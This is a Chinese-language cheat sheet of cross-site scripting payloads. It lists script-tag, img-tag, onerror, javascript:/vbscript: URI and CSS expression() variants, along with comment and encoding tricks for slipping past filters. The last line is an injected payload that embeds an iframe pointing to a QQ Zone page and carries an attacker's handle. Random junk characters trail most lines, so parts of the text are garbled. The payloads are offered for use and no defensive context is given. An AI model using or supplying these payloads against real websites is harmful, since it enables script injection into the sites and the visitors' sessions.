<script>alert("跨站")</script> (最常用)' o. E& a) c- t$ Z1 h: }% E
<img scr=javascript:alert("跨站")></img>/ Q& [1 ^% @, @5 f8 E5 c$ _
<img scr="javascript: alert(/跨站/)></img>* N a8 E- D) R8 j
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)( ?& M$ @ e( @9 }6 S! I
<img scr="#" onerror=alert(/跨站/)></img>
. \9 j5 t8 ?7 f, {% D$ ^; z<img scr="#" style="xss:expression(alert(/xss/));"></img>' b; |- ~( @" ~2 C
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
4 n$ b% T/ g/ {* V<img src=vbscript:msgbox ("xss")></img>
+ r. h' Y$ t) j& L<style> input {left:expression (alert('xss'))}</style>
5 k$ n1 J9 ?/ L$ c7 }<div style={left:expression (alert('xss'))}></div>) ~6 b# b0 Z0 A# q2 E+ j' f6 v2 p$ `
<div style={left:exp/* */ression (alert('xss'))}></div>
: ?: }" X4 [% j. _* d, L<div style={left:\0065\0078ression (alert('xss'))}></div>* X/ X w8 Y1 |+ F. ~! e
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>. T* |2 Q7 V1 ]( w
unicode <div style="{left:expRessioN (alert('xss'))}">
# j. H# T0 t$ Y A! y" ?: ~8 g# O4 i
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
2 x* \9 S8 [; u! E, b |